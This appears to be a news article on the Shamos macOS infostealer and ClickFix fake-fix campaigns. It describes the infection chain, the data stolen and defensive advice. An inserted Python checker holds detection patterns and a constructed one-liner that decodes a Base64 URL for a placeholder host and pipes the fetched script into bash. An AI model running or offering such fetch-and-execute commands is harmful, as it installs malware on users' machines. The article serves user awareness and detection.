Mac users are being targeted by a new wave of attacks known as ClickFix, where cybercriminals pose as guides or tools meant to fix system issues. In reality, they are distributing dangerous malware.
This threat is a variant of the well-known Atomic macOS Stealer (AMOS) and has been developed by a cybercriminal group called COOKIE SPIDER. Their goal is clear: to steal sensitive data such as browser-stored passwords, macOS Keychain items, Apple Notes, and even cryptocurrency wallets.
According to cybersecurity firm CrowdStrike, which was the first to detect this threat (now identified as Shamos), the malware has already attempted to infiltrate more than 300 systems worldwide since June 2025.
Distributed Through Fake “Fixes” in ClickFix Attacks
The malware is being promoted using a technique known as ClickFix attacks, where users are tricked through malicious ads or fake repositories on GitHub.
Malicious Sponsored Results in Google Search
The trap? Cybercriminals trick victims into copying and pasting commands into the macOS Terminal, supposedly to install helpful tools or fix system errors. But in reality, by running those commands, the user unknowingly downloads and installs the malware on their device.
This technique exploits the user’s trust and their desire to quickly fix a problem—without realizing they’re opening the door to a serious threat.
Malicious GitHub Repository (Source: CrowdStrike)
Some of the websites used in these attacks—such as mac-safer[.]com or rescue-mac[.]com—pose as legitimate pages that supposedly offer solutions to common macOS issues. These sites are designed to look trustworthy and even target real search queries users might enter when experiencing problems with their Mac.
Once on the site, you're presented with detailed instructions that prompt you to copy and paste commands into the Terminal, promising to fix the issue. But in reality, you're executing malicious code that installs the malware on your system.
What the Command Actually Does
Instead of fixing anything, the command you're asked to run in the Terminal hides something far more dangerous. It decodes a URL written in Base64—a common method used to disguise malicious web addresses—and then connects to a remote server to download a malicious Bash script. That script is responsible for installing the malware on your Mac without you even noticing.
Fake Instructions to Fix Printer Issues on macOS (Source: CrowdStrike)
Once the malicious script runs, the first thing it does is capture your user password. With that, it gains the access it needs to proceed with the infection.
Next, it downloads the Shamos executable (in Mach-O format) and prepares it to run without being blocked by macOS. To do this, it uses commands such as:
- xattr, which removes the quarantine tag that usually warns macOS the file might be dangerous.
- chmod, which grants execution permissions to the file, allowing the malware to bypass Gatekeeper—the security feature that prevents unverified apps from running.
In short: the system thinks everything is fine, but in reality, it has just welcomed the malware without a fight.
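As an added illustration (not code from the article or from CrowdStrike), here is a small Python checker a defender can run over a pasted Terminal command before executing it: it looks for the chain described above (a Base64-hidden URL, a remote script piped into a shell, the quarantine attribute stripped with xattr, the execute bit granted with chmod, an out.zip archive passed to curl) and decodes any Base64 token to reveal the URL without fetching anything. The sample commands are constructed, and example.invalid is a placeholder host.

```python
import base64
import re

# Indicators of the ClickFix chain described above: a Base64-encoded URL,
# a remote script piped straight into a shell, the quarantine attribute
# stripped with xattr, the execute bit granted with chmod, and the out.zip
# archive the article says is exfiltrated with curl.
INDICATORS = {
    "base64_decode": re.compile(r"\bbase64\s+(-[dD]|--decode)\b"),
    "remote_script_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z)?sh\b"),
    "quarantine_removed": re.compile(r"\bxattr\b.*\bcom\.apple\.quarantine\b"),
    "exec_bit_granted": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "out_zip_via_curl": re.compile(r"\bcurl\b.*\bout\.zip\b"),
}
# Runs of the Base64 alphabet long enough to hide a URL.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def hidden_urls(command: str) -> list:
    """Decode Base64 tokens in a command and return any URLs they hide.
    Only text is decoded; nothing is fetched or executed."""
    urls = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64 or not text: skip the token
        if text.startswith(("http://", "https://")):
            urls.append(text)
    return urls

def assess(command: str) -> dict:
    """Score one pasted command: a hidden URL or two indicators is suspicious,
    so a lone 'chmod +x' on a local script is not flagged."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(command)]
    urls = hidden_urls(command)
    if urls:
        hits.append("base64_hidden_url")
    return {"indicators": hits, "hidden_urls": urls,
            "suspicious": bool(urls) or len(hits) >= 2}

# Constructed sample commands; example.invalid is a placeholder host.
_ENCODED = base64.b64encode(b"https://example.invalid/fix.sh").decode()
SAMPLE_COMMANDS = [
    "chmod +x ./build.sh && ./build.sh",                       # benign
    f"echo {_ENCODED} | base64 -d | xargs curl -fsSL | bash",  # ClickFix-style
    "xattr -d com.apple.quarantine ./update && chmod +x ./update",
]
```

Running assess() over each entry in SAMPLE_COMMANDS flags the second and third and leaves the first alone.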
What Does the Shamos Malware Actually Do on Your Mac?
Once Shamos runs on your device, it quietly works in the background to steal as much sensitive information as possible. But before doing that, it first ensures it's not being analyzed by security researchers or tools.
The first step is running anti-VM commands designed to detect whether the malware is operating inside a virtual machine—a common setup in security analysis. If it determines it’s in a real environment, it proceeds.
Next, it uses AppleScript to perform system reconnaissance: gathering details about the host, analyzing what data it can access, and beginning data collection.
What Data Does Shamos Steal?
Shamos targets the most valuable data on your Mac. It searches for and collects:
- Cryptocurrency wallet files
- macOS Keychain data
- Notes stored in Apple Notes
- Browser information such as passwords, cookies, history, and tokens
Once collected, all this data is compressed into a file named out.zip and sent to the attacker’s server using the curl command, which allows web requests directly from the terminal.
More Than Just Theft: It Also Downloads Additional Malware
According to CrowdStrike experts, Shamos doesn’t stop at data theft. It also has the capability to download additional malicious payloads directly into the user’s home directory.
In fact, there have been cases where attackers deployed:
- A fake version of the Ledger Live app (used to manage cryptocurrency)
- A botnet module, turning your Mac into part of a network of infected devices
This makes Shamos a far more complex threat than a typical infostealer—it can also pave the way for other types of cyberattacks, including ransomware or large-scale fraud.
How to Avoid Falling for This Trap
The best defense against Shamos (and other similar malware) is to never run Terminal commands you found online unless you fully understand what they do.
This includes scripts you come across on social media, forums, sketchy websites, or even GitHub repositories, as many cybercriminals are unfortunately using that platform to spread malicious code disguised as helpful tools.
If you’re having an issue with your Mac, avoid clicking on sponsored ads that show up in search engines—many are being used to promote these fake fixes.
Instead, rely on trusted sources like:
- Apple’s official forums, which are moderated and verified
- macOS’s built-in Help (open Spotlight with Cmd + Space and type “Help”)
Remember: if something sounds too good to be true (“fix your Mac in one click”), it probably is a trap.
ClickFix Attacks: Increasingly Common (and Dangerous)
ClickFix attacks are becoming a widely used tactic to spread malware. Essentially, attackers pose as technical guides or troubleshooting tools and instruct you to manually run commands in your Mac’s Terminal.
These campaigns are even spreading through:
- TikTok videos showing supposed “hacks” to fix system issues
- Fake CAPTCHAs designed to make you think you're unlocking legitimate content
- Fake fixes for popular app errors, like Google Meet
This kind of attack has proven so effective that it’s already been used in ransomware campaigns—and even by state-sponsored groups.
Conclusion: What Can You Do Right Now?
Shamos is a clear sign that Mac users can no longer blindly trust the security of their operating system. Today, cybercriminals are using increasingly sophisticated techniques to fool even experienced users.
If you want to keep your Mac safe, remember:
- Don’t run commands you don’t understand
- Avoid links and downloads from suspicious sites
- Use trusted security tools
- Rely on official sources when facing an issue
Your best protection is staying informed and acting with caution.